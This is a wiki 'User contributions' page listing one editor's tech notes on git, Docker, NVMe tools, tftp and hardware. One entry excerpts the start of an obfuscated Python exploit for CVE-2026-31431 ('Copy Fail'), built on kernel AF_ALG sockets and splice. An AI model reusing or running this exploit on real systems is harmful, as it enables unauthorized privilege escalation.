User contributions for Kenneth
Jump to navigation
Jump to search
17 June 2026
- 05:3505:35, 17 June 2026 diff hist +1,471 N Git/Branch Created page with "== Create new branch from last 10 commits == https://stackoverflow.com/questions/50992188/how-to-push-a-shallow-clone-to-a-new-repo <pre> # First, shallow-clone the old repo to the depth we want to keep git clone --depth=50 https://...@bitbucket.org/....git # Go into the directory of the clone cd clonedrepo # Once in the clone's repo directory, remove the old origin git remote remove origin # Store the hash of the oldest commit (ie. in this case, the 50th) in a var..." current
- 05:3205:32, 17 June 2026 diff hist +16 Git/Signing Unsigned →Create new branch from last 10 commits current
- 05:3205:32, 17 June 2026 diff hist +1,840 N Git/Signing Unsigned Created page with "== Sign Current Commit == git commit --amend --no-edit -S == Rebase everything == Rebase everything until 'development' (or any hash) <ref>https://superuser.com/questions/397149/can-you-gpg-sign-old-commits</ref> git rebase --exec 'git commit --amend --no-edit -n -S' -i development Resign everything from root: git rebase --exec 'git commit --amend --no-edit -n -S' -i --root == Create new branch from last 10 commits == https://stackoverflow.com/questions/5099218..."
4 June 2026
- 15:3015:30, 4 June 2026 diff hist +327 Mitmproxy No edit summary current
- 15:2915:29, 4 June 2026 diff hist +88 N Mitmproxy Created page with "https://www.mitmproxy.org/ mitmproxy is a free and open source interactive HTTPS proxy."
- 15:2815:28, 4 June 2026 diff hist +338 N Mitm Created page with "A Man-in-the-Middle (MitM) attack is a cyberattack where a hacker secretly intercepts and relays communications between two parties. The victims believe they are talking directly to each other, but the attacker is secretly eavesdropping on or altering the data, often to steal login credentials or financial information See mitmproxy" current
1 June 2026
- 00:4600:46, 1 June 2026 diff hist +931 Curl →Connect to server by ip and pass hostname current
- 00:3100:31, 1 June 2026 diff hist +354 Windows/Hide Volume Button No edit summary current
- 00:2300:23, 1 June 2026 diff hist +130 Windows/Hide Volume Button No edit summary
30 May 2026
- 06:5106:51, 30 May 2026 diff hist +55 AutoHotkey →While Loop current
- 06:4706:47, 30 May 2026 diff hist +962 AutoHotkey →Version 2 Header
- 05:0005:00, 30 May 2026 diff hist +173 AutoHotkey →Arrow Keys
- 04:5604:56, 30 May 2026 diff hist +71 AutoHotkey →keywords
- 03:3103:31, 30 May 2026 diff hist +952 N Linux/Open Files Created page with "List processes with most open files: lsof | awk '{print $1}' | sort | uniq -c | sort -rn | head -10 The "Too many open files" error occurs when a process or user reaches the upper limit of allocated file descriptors (FDs), which in Linux includes network sockets, pipes, and regular files. To resolve this, you need to identify the culprit process and then adjust either the user-level session limits or the system-wide limits. Check session limits: Run ulimit -Sn to chec..." current
- 03:0103:01, 30 May 2026 diff hist +187 Firefox →SSO Trust current
18 May 2026
- 23:1623:16, 18 May 2026 diff hist +39 Docker →Removing all containers and images current
- 23:1523:15, 18 May 2026 diff hist +523 Docker →Removing all containers and images
- 22:1022:10, 18 May 2026 diff hist +27 Google/IssueTracker No edit summary current
- 22:0922:09, 18 May 2026 diff hist +33 N Google/IssueTracker Created page with " https://issuetracker.google.com/"
- 18:0418:04, 18 May 2026 diff hist +214 NVMe/nvme-cli →v2 nvme-cli current
- 17:0717:07, 18 May 2026 diff hist +989 Movies No edit summary current
- 16:5916:59, 18 May 2026 diff hist +290 N Movies Created page with "== Taglines == Movie taglines are short, punchy marketing slogans used on posters and in trailers to capture a film's tone, genre, or core premise. Unlike plot summaries, they act as "vibe summaries" meant to quickly hook the viewer's attention and promise a specific cinematic experience."
15 May 2026
- 17:5617:56, 15 May 2026 diff hist +1,120 N PCH Created page with "== Platform Controller Hub (PCH) == Chipset PCH - A Platform Controller Hub (PCH) is a microchip on a motherboard that manages data flow and communication between the CPU and attached peripherals. It essentially acts as the traffic controller for your computer's input/output (I/O) functions. ref: <ref>https://en.wikipedia.org/wiki/Platform_Controller_Hub</ref> === What the PCH Does === * I/O Management: Handles communication for your USB ports, audio, SATA (hard driv..." current
- 17:4917:49, 15 May 2026 diff hist +33 N X13SAE-F Kenneth moved page X13SAE-F to Supermicro/X13SAE-F current Tag: New redirect
- 17:4917:49, 15 May 2026 diff hist 0 m Supermicro/X13SAE-F Kenneth moved page X13SAE-F to Supermicro/X13SAE-F current
- 17:4917:49, 15 May 2026 diff hist +215 Supermicro/X13SAE-F No edit summary
- 17:4617:46, 15 May 2026 diff hist +109 N Supermicro/X13SAE-F Created page with " X13SAE-F | Motherboards | Products | Supermicro https://www.supermicro.com/en/products/motherboard/x13sae-f"
13 May 2026
- 18:5418:54, 13 May 2026 diff hist +1,544 Blackbox →Trust all keys current
12 May 2026
- 22:3022:30, 12 May 2026 diff hist +223 ICX →Public Keys current
- 22:1222:12, 12 May 2026 diff hist +3 Linux/tftp-hpa →tftp user current
- 22:1222:12, 12 May 2026 diff hist +34 Linux/tftp-hpa →Map File
- 22:1022:10, 12 May 2026 diff hist +68 Linux/tftp-hpa →Install
- 22:0922:09, 12 May 2026 diff hist +573 Linux/tftp-hpa →keywords
- 21:5921:59, 12 May 2026 diff hist +41 Linux/tftp-hpa →Install
- 21:5721:57, 12 May 2026 diff hist +5 Linux/tftp-hpa →Dependencies
- 21:4921:49, 12 May 2026 diff hist +18 ICX →Public Keys
- 21:4321:43, 12 May 2026 diff hist −1 Ubuntu/22 →= simplified apt sources.list current
- 21:4221:42, 12 May 2026 diff hist +327 Ubuntu/20 No edit summary current
- 16:3616:36, 12 May 2026 diff hist +385 Python →Import and Modules current
8 May 2026
- 20:4620:46, 8 May 2026 diff hist +138 WinGet →Python 3.14 current
- 20:4020:40, 8 May 2026 diff hist +44 WinGet →Python 3.14
5 May 2026
- 22:2622:26, 5 May 2026 diff hist +273 WinGet →Copilot
- 18:0718:07, 5 May 2026 diff hist +161 NVMe/nvme-cli →v2 nvme-cli
- 18:0118:01, 5 May 2026 diff hist +3 NVMe/nvme-cli →v2 dependencies
- 17:4417:44, 5 May 2026 diff hist +56 NVMe/nvme-cli →v2 nvme-cli
- 17:4417:44, 5 May 2026 diff hist +65 NVMe/nvme-cli →v2 libnvme
- 17:4317:43, 5 May 2026 diff hist +104 NVMe/nvme-cli →v2 nvme-cli
- 17:3717:37, 5 May 2026 diff hist +741 NVMe/nvme-cli →Build and Install v2
- 17:0617:06, 5 May 2026 diff hist +26 N CVE/copy-fail-CVE-2026-31431 Created page with "See CVE/CVE-2026-31431" current
- 17:0517:05, 5 May 2026 diff hist +901 N CVE/CVE-2026-31431 Created page with "== Copy Fail == === copy_fail_exp.py === <pre> #!/usr/bin/env python3 import os as g,zlib,socket as s def d(x):return bytes.fromhex(x) def c(f,t,c): a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o) try:u...." current